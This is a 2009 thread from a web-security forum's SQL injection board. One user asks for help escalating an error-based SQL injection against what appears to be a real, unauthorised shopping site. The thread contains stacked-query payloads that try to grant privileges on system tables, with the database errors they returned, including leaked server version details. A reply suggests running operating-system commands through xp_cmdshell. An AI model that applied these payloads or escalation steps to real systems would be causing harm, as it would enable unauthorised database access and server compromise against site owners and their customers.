 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
SQL Injection on Deny Select |
 |
 Posted: Fri Feb 06, 2009 4:22 pm |
 |
|
| delta |
| Advanced user |
 |
|
| Joined: Jan 11, 2009 |
| Posts: 60 |
|
|
|
 |
|
 |
|
i'm having a little problem with the select in a site.
| Code: |
Microsoft OLE DB Provider for SQL Server error '80040e09'
SELECT permission denied on object 'sysobjects', database 'database', owner 'dbo'.
/venda_prod.asp, line 12
|
So i tried:
https://www.site.com./venda_prod.asp?id=372;use database grant select on sysobjects to public--
And it should work, but the only think i get is:
| Code: | Microsoft VBScript runtime error '800a000d'
Type mismatch: '[string: "372;use database gra"]'
/venda_prod.asp, line 92 |
PS.:
If i try:
https://www.site.com./venda_prod.asp?id=AAAAAAA;use database grant select on sysobjects to public--
Or try to put any other string that don't exist in the DB i receive:
| Code: | Microsoft OLE DB Provider for SQL Server error '80040e14'
Invalid column name 'AAAAAAA'.
/venda_prod.asp, line 12 |
oO :S
Any idea?:S[/code] |
|
|
|
|
|
|
|
|
| Posted: Sat Feb 07, 2009 12:25 am |
|
|
| one23 |
| Advanced user |
 |
|
| Joined: Dec 12, 2008 |
| Posts: 98 |
|
|
|
|
|
|
|
Owner is dbo , did you tried to execute command ?
if possible Send Me The Link through PM To Check iT ! |
|
|
|
|
| Posted: Sat Feb 07, 2009 5:45 am |
|
|
| delta |
| Advanced user |
|
|
| Joined: Jan 11, 2009 |
| Posts: 60 |
|
|
|
|
|
|
|
| one23 wrote: | Owner is dbo , did you tried to execute command ?
if possible Send Me The Link through PM To Check iT ! |
What do you mean with "execute command"? |
|
|
|
|
| Posted: Sat Feb 07, 2009 4:40 pm |
|
|
| one23 |
| Advanced user |
|
|
| Joined: Dec 12, 2008 |
| Posts: 98 |
|
|
|
|
|
|
|
Well , It's Long Time i Didn't Inject In MSSQL And Im
Not Really Good At Injection in MSSQL
Any way , I Don't Remember The Options
For Executing Command , i Think If
user_name() = 'dbo' , So We Can
Execute Command On The Server With This :
EXEC xp_cmdshell 'net user'; -- priv
For More Info Google.Com And MSSQL Cheat Shet :
http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/
[ if i said some thing wrong sorry any way ... ] |
|
|
|
|
|
|
|
|
| Posted: Sat Feb 07, 2009 6:30 pm |
|
|
| delta |
| Advanced user |
|
|
| Joined: Jan 11, 2009 |
| Posts: 60 |
|
|
|
|
|
|
|
| one23 wrote: | Well , It's Long Time i Didn't Inject In MSSQL And Im
Not Really Good At Injection in MSSQL
Any way , I Don't Remember The Options
For Executing Command , i Think If
user_name() = 'dbo' , So We Can
Execute Command On The Server With This :
EXEC xp_cmdshell 'net user'; -- priv
For More Info Google.Com And MSSQL Cheat Shet :
http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/
[ if i said some thing wrong sorry any way ... ] |
I don't have dbo, can't use xp_cmdshell or anything like that
Just need to be able to use the select, maybe i need to change the syntax, don't know. |
|
|
|
|
| Posted: Tue Feb 10, 2009 1:30 pm |
|
|
| delta |
| Advanced user |
|
|
| Joined: Jan 11, 2009 |
| Posts: 60 |
|
|
|
|
|
|
|
|
|
|
|
| Posted: Tue Feb 10, 2009 1:57 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| Do you have already worked out syntax error solution? I mean - can you fetch "@@version"? Or you are at very beginning and can't get syntax right? |
|
|
|
|
|
|
|
|
| Posted: Wed Feb 11, 2009 1:59 am |
|
|
| delta |
| Advanced user |
|
|
| Joined: Jan 11, 2009 |
| Posts: 60 |
|
|
|
|
|
|
|
The syntax is right, i can get @@version, db name, user, server name and all db's in the server without any probs.
| Quote: | | Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.818 (Intel X86) May 31 2003 16:08:15 Copyright (c) 1988-2003 Microsoft Corporation Workgroup Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to a column of data type int. |
https://www.site.com./venda_prod.asp?id=372;use database grant select on sysobjects to public--
The id '372' exists, otherwise i get | Quote: | | Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record. |
But, like i said, when i try this command:
https://www.site.com./venda_prod.asp?id=372;use database grant select on sysobjects to public--
i get this:
| Quote: | Microsoft VBScript runtime error '800a000d'
Type mismatch: '[string: "372;use database gra"]'
/venda_prod.asp, line 92 |
:S |
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 63
Members: 0
Total: 63
